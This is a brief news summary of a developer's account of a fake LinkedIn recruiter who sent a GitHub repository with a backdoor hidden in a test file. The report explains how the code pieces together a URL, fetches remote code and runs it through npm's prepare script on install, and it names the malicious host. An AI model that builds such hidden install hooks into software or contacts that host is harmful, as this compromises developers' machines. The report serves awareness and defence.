Backdoor discovered in fake LinkedIn job offer GitHub repo
Original: A backdoor in a LinkedIn job offer
Why This Matters
Demonstrates evolving supply chain attack sophistication using social engineering and borrowed identities to bypass developer vigilance.
A developer received a LinkedIn recruiter message with a malicious GitHub repository containing a supply chain backdoor disguised as test code. The payload executes arbitrary code automatically when npm install runs, using stolen identities for both the recruiter and commit author.
A full-stack Python developer reported discovering a supply chain attack via LinkedIn. A recruiter at a purported crypto startup sent a GitHub repository for code review, specifically asking to "check out the deprecated Node modules issue." The developer used a throwaway VPS and read-only AI tools to inspect the code instead of cloning locally. The malicious code was embedded in app/test/index.js, a 250-line file disguised as test suite. It assembled a URL (https://rest-icon-handler.store/icons/77) from fragmented strings hidden among commented-out tests, then executed arbitrary code sent from the server. The payload triggered automatically via npm's prepare script, which runs after npm install—the intended attack vector. Investigation revealed the recruiter's profile belonged to a real arts journalist with no technical background, yet suddenly displayed npm expertise when pushing the developer to run npm install. The repository's 39-commit history was attributed to a real full-stack engineer who confirmed he never worked on it and had experienced GitHub impersonation before. The attack demonstrated how supply chain compromises can target developers through social engineering and stolen identities.